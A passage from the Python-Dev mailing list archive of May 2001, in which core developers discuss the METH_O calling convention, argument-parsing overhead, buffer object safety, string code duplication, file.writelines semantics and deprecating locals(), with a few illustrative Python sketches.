

From martin at loewis.home.cs.tu-berlin.de  Mon May 28 00:45:53 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 00:45:53 +0200
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <15121.19630.329909.482775@slothrop.digicool.com> (message from
	Jeremy Hylton on Sun, 27 May 2001 14:51:26 -0400 (EDT))
References: <200105250600.f4P60lU03254@mira.informatik.hu-berlin.de>
	<3B0E1E2C.4BC121B5@lemburg.com>
	<200105251951.f4PJpQ901063@mira.informatik.hu-berlin.de>
	<3B0ED0C7.F1A665EA@lemburg.com>
	<200105260528.f4Q5SWC00882@mira.informatik.hu-berlin.de>
	<3B0F7D44.1A12CE0F@lemburg.com>
	<200105270901.f4R91E601159@mira.informatik.hu-berlin.de> <15121.19630.329909.482775@slothrop.digicool.com>
Message-ID: <200105272245.f4RMjru01021@mira.informatik.hu-berlin.de>

> I'd like to qualify this a bit.  What I reported earlier is that the
> BuiltinFunctionCall microbenchmark in pybench spends 30% of its time in
> PyArg_ParseTuple().  This strikes me as excessive, because it's a
> static property of the code.  (One could imagine writing a Python
> script that parsed the "O!|is#" format strings and generated
> efficient, specialized C code for that format.)
> 
> If we benchmark other programs, particularly those that do more work
> in the builtins, the relative cost of the argument processing will be
> lower.

Certainly: If the work inside the function increases, the overhead of
calling it will be less visible. What the benchmark shows, however,
and what my patch addresses, is that the time for *calling* a function
is primarily spent in PyArg_ParseTuple (and not in, say, building
argument tuples, putting parameters on the stack, fetching function
addresses, building method objects, and so on).
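Jeremy's parenthetical idea of generating specialized C from format strings can be sketched in a few lines of Python. This is an illustration under narrow assumptions: `gen_parser` is a hypothetical helper, it only understands `O` codes, an optional `|` and a trailing `:name` (not `O!`, `i` or `s#`), and the emitted C is untested text built around the real `PyTuple_GET_SIZE`, `PyTuple_GET_ITEM` and `PyErr_Format` calls.

```python
def gen_parser(fmt, varnames):
    """Emit specialized C for a format made only of 'O' codes, an optional
    '|' and a trailing ':name'.  Sketch only; other codes are rejected."""
    fmt, _, funcname = fmt.partition(":")
    required, _, optional = fmt.partition("|")
    if set(required + optional) - {"O"}:
        raise ValueError("only 'O' codes are supported in this sketch")
    nreq = len(required)
    nmax = nreq + len(optional)
    if len(varnames) != nmax:
        raise ValueError("need one C variable name per 'O'")
    if nreq == nmax:
        expect = "exactly %d" % nreq
    else:
        expect = "%d to %d" % (nreq, nmax)
    lines = [
        "{",
        "    int n = (int)PyTuple_GET_SIZE(args);",
        "    if (n < %d || n > %d) {" % (nreq, nmax),
        '        PyErr_Format(PyExc_TypeError, "%s() takes %s argument(s) (%%d given)", n);'
        % (funcname, expect),
        "        return NULL;",
        "    }",
    ]
    for i, name in enumerate(varnames):
        if i < nreq:
            lines.append("    %s = PyTuple_GET_ITEM(args, %d);" % (name, i))
        else:
            # Missing optional arguments are left as NULL for the callee.
            lines.append("    %s = n > %d ? PyTuple_GET_ITEM(args, %d) : NULL;"
                         % (name, i, i))
    lines.append("}")
    return "\n".join(lines)


print(gen_parser("OO|O:getattr", ["v", "name", "dflt"]))
```

The generated block does one size check and direct tuple indexing, so nothing about the format string is interpreted at call time, which is the static property Jeremy points out.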

Regards,
Martin


From tim.one at home.com  Mon May 28 01:17:27 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 19:17:27 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <20010528005058.H690@xs4all.nl>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>

[Thomas Wouters]
> And don't forget the method-specific error message by passing ':len' in
> the format string. Of course, this can easily be (and probably should be)
> done by passing another argument to whatever parses arguments in
> METH_O, rather than invoking string parsing magic every call.

Martin's patch automatically inserts the name of the function in the
TypeError it raises when a METH_O call doesn't get exactly one argument, or
gets one or more keyword arguments.

Stick to METH_O and it's a clear win, even in this respect:  there's no info
in an explicit ":len" he's not already deducing, and almost all instances of
"O:name" formats today are exactly the same this way:

if (!PyArg_ParseTuple(args, "O:abs", &v))
if (!PyArg_ParseTuple(args, "O:callable", &v))
if (!PyArg_ParseTuple(args, "O:id", &v))
if (!PyArg_ParseTuple(args, "O:hash", &v))
if (!PyArg_ParseTuple(args, "O:hex", &v))
if (!PyArg_ParseTuple(args, "O:float", &v))
if (!PyArg_ParseTuple(args, "O:len", &v))
if (!PyArg_ParseTuple(args, "O:list", &v))
else if (!PyArg_ParseTuple(args, "O:min/max", &v))
if (!PyArg_ParseTuple(args, "O:oct", &v))
if (!PyArg_ParseTuple(args, "O:ord", &obj))
if (!PyArg_ParseTuple(args, "O:reload", &v))
if (!PyArg_ParseTuple(args, "O:repr", &v))
if (!PyArg_ParseTuple(args, "O:str", &v))
if (!PyArg_ParseTuple(args, "O:tuple", &v))
if (!PyArg_ParseTuple(args, "O:type", &v))

Those are all the ones in bltinmodule.c, and nearly all of them are called
extremely frequently in *some* programs.  The only oddball is min/max, but
then it supports more than one call-list format and so isn't a METH_O
candidate anyway.  Indeed, Martin's patch gives a *better* message than we
get for some mistakes today:

>>> len(val=2)
Traceback (most recent call last):
 File "<stdin>", line 1, in ?
TypeError: len() takes exactly 1 argument (0 given)
>>>

Martin's would say

    TypeError: len takes no keyword arguments

in this case.  He should add "()" after the function name.  He should also
throw away the half of the patch complicating and slowing METH_O to get some
theoretical speedup in other cases:  make the one-arg builtins fly just as
fast as humanly possible.
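The checks Tim describes for a METH_O call can be modelled like this. `check_meth_o` is a hypothetical name and the message wording is an assumption (it includes the "()" Tim asks for); checking keywords first is what yields the clearer message for `len(val=2)`.

```python
def check_meth_o(name, args, kwargs):
    """Hypothetical model of the checks a METH_O dispatcher makes before
    calling the C function; the message wording is illustrative."""
    if kwargs:
        # Checked first, so len(val=2) is not reported as "0 given".
        raise TypeError("%s() takes no keyword arguments" % name)
    if len(args) != 1:
        raise TypeError("%s() takes exactly 1 argument (%d given)"
                        % (name, len(args)))
    return args[0]  # the single object the C function would receive


try:
    check_meth_o("len", (), {"val": 2})
except TypeError as exc:
    print(exc)  # len() takes no keyword arguments
```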


From greg at cosc.canterbury.ac.nz  Mon May 28 02:23:55 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:23:55 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPKEBIDOAA.MarkH@ActiveState.com>
Message-ID: <200105280023.MAA00996@s454.cosc.canterbury.ac.nz>

> However, it has one fatal flaw, and no one seems
> to know what to do about it.

I think it would be safe if:

1) it kept a reference to the underlying object, and

2) it re-fetched the pointer and length info each time it was
   needed, using the underlying object's buffer interface.
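Greg's two conditions can be contrasted with a small Python model. `CachingView` and `RefetchingView` are hypothetical classes: Python's own bounds checks mean nothing can actually crash here, so the model only shows how a cached length goes stale once the underlying `bytearray` shrinks.

```python
class CachingView:
    """Models the flaw: the length is captured once, at creation time."""

    def __init__(self, obj):
        self.obj = obj              # point 1: keeps the object alive
        self.length = len(obj)      # cached once, never refreshed

    def __getitem__(self, i):
        if not 0 <= i < self.length:
            raise IndexError(i)
        # In C this read would go through a cached pointer that may now be
        # stale; here Python's own bounds check on self.obj hides the danger.
        return self.obj[i]


class RefetchingView:
    """Greg's proposal: ask the underlying object again on every access."""

    def __init__(self, obj):
        self.obj = obj              # point 1: keeps the object alive

    def __getitem__(self, i):
        length = len(self.obj)      # point 2: re-fetched on each access
        if not 0 <= i < length:
            raise IndexError(i)
        return self.obj[i]


data = bytearray(b"abcdef")
cached, fresh = CachingView(data), RefetchingView(data)
del data[2:]                        # the object shrinks behind the views' backs
print(cached.length, len(data))     # 6 2  (the cached view is out of date)
print(fresh[1])                     # 98   (ord("b"))
```

The price of `RefetchingView` is an extra query on every `b[i]`, which is the cost Tim objects to in his reply.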

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg at cosc.canterbury.ac.nz	   +--------------------------------------+


From greg at cosc.canterbury.ac.nz  Mon May 28 02:28:41 2001
From: greg at cosc.canterbury.ac.nz (Greg Ewing)
Date: Mon, 28 May 2001 12:28:41 +1200 (NZST)
Subject: [Python-Dev] strop vs. string
In-Reply-To: <20010525132752.B5402@lyra.org>
Message-ID: <200105280028.MAA01000@s454.cosc.canterbury.ac.nz>

Greg Stein <gstein at lyra.org>

> "badly" is overstating the problem. It caches a pointer when it shouldn't.
> This doesn't work well

But "doesn't work well" means "can crash the interpreter".
I don't think "badly" is an overstatement here...



From tim.one at home.com  Mon May 28 03:42:30 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:42:30 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B10D758.3741AC2F@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMENEKEAA.tim.one@home.com>

[MAL]
> I guess there are three ways to "solve" this:
>
> a) mutable types don't implement the getreadbuf interface

Of the few types that implement it today, that would leave only strings
(8-bit and Unicode).  Too much machinery just for that.  Besides, I once
posted an example to c.l.py showing how to use regexps to search mmap'ed
files, so *that* must continue to work forever <wink>.

> b) the getreadbuf interface is complemented with a callback
>    interface, so the the buffer object can be notified of
>    the change

I like this best, although there's no bound on the number of buffers that
may need to be notified in case of change (i.e., the object would need to
maintain a list of buffers to be notified).

> c) calling getreadbuf on a mutable object causes this object
>    to become immutable

Even easier, core dump as soon as getreadbuf is called <wink>.
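Option (b) can be sketched in Python with a weak set standing in for the list of buffers Tim mentions, so the owner does not keep dead views alive. `NotifyingBuffer` and `_View` are hypothetical names, and rebinding `_data` stands in for a reallocation in C.

```python
import weakref


class NotifyingBuffer:
    """Sketch of option (b): the owner tells its views when it changes."""

    def __init__(self, data):
        self._data = data
        self._views = weakref.WeakSet()   # views to notify; dead ones vanish

    def view(self):
        v = _View(self)
        self._views.add(v)
        return v

    def replace(self, new_data):
        self._data = new_data             # stands in for a C reallocation
        for v in list(self._views):
            v.invalidate()                # each view drops its cached data


class _View:
    def __init__(self, owner):
        self._owner = owner               # keeps the owner alive
        self._cache = None                # cached "pointer" to the data

    def invalidate(self):
        self._cache = None

    def _current(self):
        if self._cache is None:           # re-fetch only after a change
            self._cache = self._owner._data
        return self._cache

    def __getitem__(self, i):
        return self._current()[i]

    def __len__(self):
        return len(self._current())


buf = NotifyingBuffer(b"abcdef")
v = buf.view()
print(len(v), v[0])   # 6 97
buf.replace(b"xy")
print(len(v), v[0])   # 2 120
```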

[Greg Ewing]
> I think it would be safe if:
>
> 1) it kept a reference to the underlying object, and

That much it already does.

> 2) it re-fetched the pointer and length info each time it was
>    needed, using the underlying object's buffer interface.

If after

    b = buffer(some_object)

b.__getitem__ needed to refetch the info between

    b[i]
and
    b[i+1]

I expect it would be so slow even Greg wouldn't want it anymore.


From tim.one at home.com  Mon May 28 03:52:18 2001
From: tim.one at home.com (Tim Peters)
Date: Sun, 27 May 2001 21:52:18 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B0FD023.C4588919@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>

[Tim]
> About combining strop and buffers and strings, don't forget
> unicodeobject.c:  that's got oodles of basically duplicate code too.
> /F suggested dealing with the minor differences via maintaining one
> code file that gets compiled multiple times w/ appropriate #defines.

[MAL]
> Hmm, that only saves us a few kB in source, but certainly not
> in the object files.

That's not the point.  Manually duplicated code blocks always get out of
synch, as people fix bugs in, or enhance, one of them but don't even know
about the others.  /F brought this up after I pissed away a few hours trying
to repair one of these in all places, and he noted that strop.replace() and
string.replace() are woefully inefficient anyway.

> The better idea would be making the types subclass from a generic
> abstract string object -- I just don't know how this will be
> possible with Guido's type patches. We'll just have to wait,
> I guess.

Wait for what?  If it were possible, is the chance that you'd take time to
rework unicodeobject.c to "subclass from a generic abstract string object"
greater than 0?  The chance that I would is exactly 0.


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 08:36:49 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 08:36:49 +0200
Subject: [Python-Dev] Special-casing "O"
Message-ID: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>

> How is METH_O different than METH_OLDARGS? 

METH_O will raise an exception if the function is called with more
than one argument, without calling the function. METH_OLDARGS will
pass a tuple in this case.

I believe you cannot distinguish between a single tuple argument and
an invocation with multiple arguments in a METH_OLDARGS function, is
that true?

Regards,
Martin


From martin at loewis.home.cs.tu-berlin.de  Mon May 28 09:40:54 2001
From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 28 May 2001 09:40:54 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
Message-ID: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>

When investigating calling conventions, I took a special look at
METH_OLDARGS occurrences. While most of them look reasonable,
file.writelines caught my attention. It has

	if (args == NULL || !PySequence_Check(args)) {
		PyErr_SetString(PyExc_TypeError,
			   "writelines() argument must be a sequence of strings");
		return NULL;
	}

Because it is a METH_OLDARGS method, you can do

f=open("/tmp/x","w")
f.writelines("foo\n","bar\n")

With my upcoming patches, I'd replace this with METH_O, making this
call illegal. Does anybody see a problem with that change in
semantics?
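The reason the two-argument call slips through can be modelled in Python: under METH_OLDARGS the two strings arrive as one tuple, and a tuple passes the sequence check. All function names are hypothetical, `None` stands in for NULL, and `collections.abc.Sequence` approximates `PySequence_Check`.

```python
import io
from collections.abc import Sequence


def writelines_body(f, arg):
    # Mirrors the quoted C test: NULL (None here) or a non-sequence is rejected.
    if arg is None or not isinstance(arg, Sequence):
        raise TypeError("writelines() argument must be a sequence of strings")
    for line in arg:
        f.write(line)


def call_oldargs(f, *args):
    # METH_OLDARGS packing as modelled here.
    if len(args) == 1:
        packed = args[0]            # a single argument is passed bare
    elif args:
        packed = args               # several arguments arrive as one tuple
    else:
        packed = None               # no arguments arrive as NULL
    return writelines_body(f, packed)


def call_meth_o(f, *args):
    # METH_O: the count is checked before the body ever runs.
    if len(args) != 1:
        raise TypeError("writelines() takes exactly 1 argument (%d given)"
                        % len(args))
    return writelines_body(f, args[0])


out = io.StringIO()
call_oldargs(out, "foo\n", "bar\n")     # accepted: the tuple is a sequence
print(repr(out.getvalue()))             # 'foo\nbar\n'
```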

Regards,
Martin


From thomas at xs4all.net  Mon May 28 10:17:58 2001
From: thomas at xs4all.net (Thomas Wouters)
Date: Mon, 28 May 2001 10:17:58 +0200
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>; from martin@loewis.home.cs.tu-berlin.de on Mon, May 28, 2001 at 09:40:54AM +0200
References: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <20010528101758.K690@xs4all.nl>

On Mon, May 28, 2001 at 09:40:54AM +0200, Martin v. Loewis wrote:

> When investigating calling conventions, I took a special look at
> METH_OLDARGS occurrences. While most of them look reasonable,
> file.writelines caught my attention. It has

> 	if (args == NULL || !PySequence_Check(args)) {
> 		PyErr_SetString(PyExc_TypeError,
> 			   "writelines() argument must be a sequence of strings");
> 		return NULL;
> 	}

> Because it is a METH_OLDARGS method, you can do

> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")

> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Hell yeah. About the same problem as with the 'l.append("foo", "bar")'
problem in 1.5.2 -> [1.6, 2.x]. Oddly enough, this behaviour was added in
2.0, by converting a PyList_Check into a PySequence_Check:

$ python1.5
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
Traceback (innermost last):
  File "<stdin>", line 1, in ?
TypeError: writelines() requires list of strings

$ python2.0
>>> file.writelines("foo\n", "bar\n", "baz", "baz", "baz\n")
>>> 

I do think we'll have to allow for this for one more release, with warnings
and all. It's extremely unlikely that anyone is using this, but changing it
without warning will definitely not benefit 2.x's image wrt. stability ;P

If bugfix-releases were allowed to generate additional warnings, I'd add a
warning to 2.1.1....



From mal at lemburg.com  Mon May 28 11:04:51 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:04:51 +0200
Subject: [Python-Dev] strop vs. string
References: <LNBBLJKPBEHFEDALKOLCGENFKEAA.tim.one@home.com>
Message-ID: <3B1214B3.9A4C295D@lemburg.com>

Tim Peters wrote:
> 
> [Tim]
> > About combining strop and buffers and strings, don't forget
> > unicodeobject.c:  that's got oodles of basically duplicate code too.
> > /F suggested dealing with the minor differences via maintaining one
> > code file that gets compiled multiple times w/ appropriate #defines.
> 
> [MAL]
> > Hmm, that only saves us a few kB in source, but certainly not
> > in the object files.
> 
> That's not the point.  Manually duplicated code blocks always get out of
> synch, as people fix bugs in, or enhance, one of them but don't even know
> about the others.  /F brought this up after I pissed away a few hours trying
> to repair one of these in all places, and he noted that strop.replace() and
> string.replace() are woefully inefficient anyway.

Ok, so what we'd need is a bunch of generic low-level string 
operations: one set for 8-bit and one for 16-bit code. 

Looking at unicodeobject.c it seems that the section "Helpers" would
be a good start, plus perhaps a few bits from the method implementations
refactored to form a low-level string template library.

Perhaps we should move this code into
a file stringhelpers.h which then gets included by stringobject.c
and unicodeobject.c with appropriate #defines set up for
8-bit strings and for Unicode.

> > The better idea would be making the types subclass from a generic
> > abstract string object -- I just don't know how this will be
> > possible with Guido's type patches. We'll just have to wait,
> > I guess.
> 
> Wait for what?  If it were possible, is the chance that you'd take time to
> rework unicodeobject.c to "subclass from a generic abstract string object"
> greater than 0?  The chance that I would is exactly 0.

Well, that's hard to say. It would certainly be low-priority;
same for the above refactoring.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Mon May 28 11:19:16 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Mon, 28 May 2001 11:19:16 +0200
Subject: [Python-Dev] Special-casing "O"
References: <LNBBLJKPBEHFEDALKOLCIENAKEAA.tim.one@home.com>
Message-ID: <3B121814.E5E9896A@lemburg.com>

Tim Peters wrote:
> 
> [Thomas Wouters]
> > And don't forget the method-specific error message by passing ':len' in
> > the format string. Of course, this can easily be (and probably should be)
> > done by passing another argument to whatever parses arguments in
> > METH_O, rather than invoking string parsing magic every call.
> 
> Martin's patch automatically inserts the name of the function in the
> TypeError it raises when a METH_O call doesn't get exactly one argument, or
> gets one or more keyword arguments.
> 
> Stick to METH_O and it's a clear win, even in this respect:  there's no info
> in an explicit ":len" he's not already deducing, and almost all instances of
> "O:name" formats today are exactly the same this way:
> 
> if (!PyArg_ParseTuple(args, "O:abs", &v))
> if (!PyArg_ParseTuple(args, "O:callable", &v))
> if (!PyArg_ParseTuple(args, "O:id", &v))
> if (!PyArg_ParseTuple(args, "O:hash", &v))
> if (!PyArg_ParseTuple(args, "O:hex", &v))
> if (!PyArg_ParseTuple(args, "O:float", &v))
> if (!PyArg_ParseTuple(args, "O:len", &v))
> if (!PyArg_ParseTuple(args, "O:list", &v))
> else if (!PyArg_ParseTuple(args, "O:min/max", &v))
> if (!PyArg_ParseTuple(args, "O:oct", &v))
> if (!PyArg_ParseTuple(args, "O:ord", &obj))
> if (!PyArg_ParseTuple(args, "O:reload", &v))
> if (!PyArg_ParseTuple(args, "O:repr", &v))
> if (!PyArg_ParseTuple(args, "O:str", &v))
> if (!PyArg_ParseTuple(args, "O:tuple", &v))
> if (!PyArg_ParseTuple(args, "O:type", &v))
> 
> Those are all the ones in bltinmodule.c, and nearly all of them are called
> extremely frequently in *some* programs.  The only oddball is min/max, but
> then it supports more than one call-list format and so isn't a METH_O
> candidate anyway.  Indeed, Martin's patch gives a *better* message than we
> get for some mistakes today:
> 
> >>> len(val=2)
> Traceback (most recent call last):
>  File "<stdin>", line 1, in ?
> TypeError: len() takes exactly 1 argument (0 given)
> >>>
> 
> Martin's would say
> 
>     TypeError: len takes no keyword arguments
> 
> in this case.  He should add "()" after the function name.  He should also
> throw away the half of the patch complicating and slowing METH_O to get some
> theoretical speedup in other cases:  make the one-arg builtins fly just as
> fast as humanly possible.

If we end up only optimizing the re.match("O+") case, we wouldn't need 
the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
and Martin could call the underlying API with one or more PyObject*
taken directly from the Python VM stack.

In that case, please consider at least supporting "O", "OO" and "OOO"
with optional arguments treated like I suggested in an earlier
posting (simply pass NULL and let the API take care of assigning
a default value).

This would take care of most builtins:

Python/bltinmodule.c:
--      if (!PyArg_ParseTuple(args, "OO:filter", &func, &seq))
--      if (!PyArg_ParseTuple(args, "OO:cmp", &a, &b))
--      if (!PyArg_ParseTuple(args, "OO:coerce", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO:divmod", &v, &w))
--      if (!PyArg_ParseTuple(args, "OO|O:getattr", &v, &name, &dflt))
--      if (!PyArg_ParseTuple(args, "OO:hasattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OOO:setattr", &v, &name, &value))
--      if (!PyArg_ParseTuple(args, "OO:delattr", &v, &name))
--      if (!PyArg_ParseTuple(args, "OO|O:pow", &v, &w, &z))
--      if (!PyArg_ParseTuple(args, "OO|O:reduce", &func, &seq, &result))
--      if (!PyArg_ParseTuple(args, "OO:isinstance", &inst, &cls))
--      if (!PyArg_ParseTuple(args, "OO:issubclass", &derived, &cls))
--      if (!PyArg_ParseTuple(args, "O:abs", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:apply", &func, &alist, &kwdict))
--      if (!PyArg_ParseTuple(args, "O:callable", &v))
--      if (!PyArg_ParseTuple(args, "O|O:complex", &r, &i))
--      if (!PyArg_ParseTuple(args, "O:id", &v))
--      if (!PyArg_ParseTuple(args, "O:hash", &v))
--      if (!PyArg_ParseTuple(args, "O:hex", &v))
--      if (!PyArg_ParseTuple(args, "O:float", &v))
--      if (!PyArg_ParseTuple(args, "O|O:iter", &v, &w))
--      if (!PyArg_ParseTuple(args, "O:len", &v))
--      if (!PyArg_ParseTuple(args, "O:list", &v))
--      if (!PyArg_ParseTuple(args, "O|OO:slice", &start, &stop, &step))
--      else if (!PyArg_ParseTuple(args, "O:min/max", &v))
--      if (!PyArg_ParseTuple(args, "O:oct", &v))
--      if (!PyArg_ParseTuple(args, "O:ord", &obj))
--      if (!PyArg_ParseTuple(args, "O:reload", &v))
--      if (!PyArg_ParseTuple(args, "O:repr", &v))
--      if (!PyArg_ParseTuple(args, "O:str", &v))
--      if (!PyArg_ParseTuple(args, "O:tuple", &v))
--      if (!PyArg_ParseTuple(args, "O:type", &v))
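One way to read MAL's proposal, sketched in Python: the dispatcher checks the count against limits stored with the method and pads missing optional arguments with `None` (standing in for NULL), leaving the default to the callee. `objargs_call`, `my_pow` and the `nmin`/`nmax` limits are hypothetical; where such limits would live in the method table is exactly the question Tim raises in his reply.

```python
def objargs_call(func, nmin, nmax, *args):
    """Hypothetical METH_OBJARGS-style dispatch: check the count against
    limits stored with the method, then pass the objects positionally,
    padding missing optional ones with None (standing in for NULL)."""
    if not nmin <= len(args) <= nmax:
        raise TypeError("%s() takes %d to %d arguments (%d given)"
                        % (func.__name__, nmin, nmax, len(args)))
    padded = args + (None,) * (nmax - len(args))
    return func(*padded)


def my_pow(v, w, z):
    # The callee supplies its own default when z is "NULL".
    if z is None:
        return v ** w
    return pow(v, w, z)


print(objargs_call(my_pow, 2, 3, 2, 10))     # 1024
print(objargs_call(my_pow, 2, 3, 2, 10, 7))  # 2
```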



From jeremy at digicool.com  Mon May 28 18:45:27 2001
From: jeremy at digicool.com (Jeremy Hylton)
Date: Mon, 28 May 2001 12:45:27 -0400 (EDT)
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
References: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <15122.32935.53414.174221@slothrop.digicool.com>

>>>>> "MvL" == Martin v Loewis <martin at loewis.home.cs.tu-berlin.de> writes:

  >> How is METH_O different than METH_OLDARGS?

  MvL> METH_O will raise an exception if the function is called with
  MvL> more than one argument, without calling the
  MvL> function. METH_OLDARGS will pass a tuple in this case.

Yes, I see that now.  I'm +1 on METH_O, then.

Jeremy


From tim.one at home.com  Mon May 28 19:23:47 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 13:23:47 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <200105280636.f4S6anZ00972@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEONKEAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> I believe you cannot distinguish between a single tuple argument and
> an invocation with multiple arguments in a METH_OLDARGS function, is
> that true?

That's the conclusion I reached after staring at the code.


From fdrake at acm.org  Mon May 28 20:20:01 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:20:01 -0400 (EDT)
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgotten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake at acm.org  Mon May 28 20:33:13 2001
From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
	<200103112137.QAA13084@cj20424-a.reston1.va.home.com>
	<001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine for me. Will that deprecation already be active with 2.1, e.g.
 > having locals() and param-less vars() raise a warning?
 > I imagine a (new) function that produces a snapshot of the values in the
 > local, free and cell vars of a scope can do the job required for simple
 > debugging (the copy will not allow modifying the values back),
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the documentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred



From tim.one at home.com  Tue May 29 01:42:05 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the documentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.
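For reference, the `% locals()` idiom and one possible shape of a read-only snapshot mapping (along the lines Samuele describes in Fred's quote) can be sketched as follows. `describe`, `snapshot_locals` and `f` are hypothetical; `snapshot_locals` relies on CPython's `sys._getframe`, so it is implementation-specific, and the sketch uses modern Python syntax.

```python
import sys
import types


def describe(name, count):
    # The idiom Tim cites: interpolate local names by key.
    return "%(name)s has %(count)d items" % locals()


def snapshot_locals():
    """Hypothetical helper: a read-only copy of the caller's local names.
    Relies on CPython's sys._getframe, so it is implementation-specific."""
    frame = sys._getframe(1)
    return types.MappingProxyType(dict(frame.f_locals))


def f():
    a, b = 1, "x"
    return snapshot_locals()


print(describe("spam", 3))  # spam has 3 items
m = f()
print(m["a"], m["b"])       # 1 x
```

Assigning through the snapshot (`m["a"] = 2`) raises `TypeError`, so it cannot be used to modify the values back.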


From tim.one at home.com  Tue May 29 02:01:33 2001
From: tim.one at home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
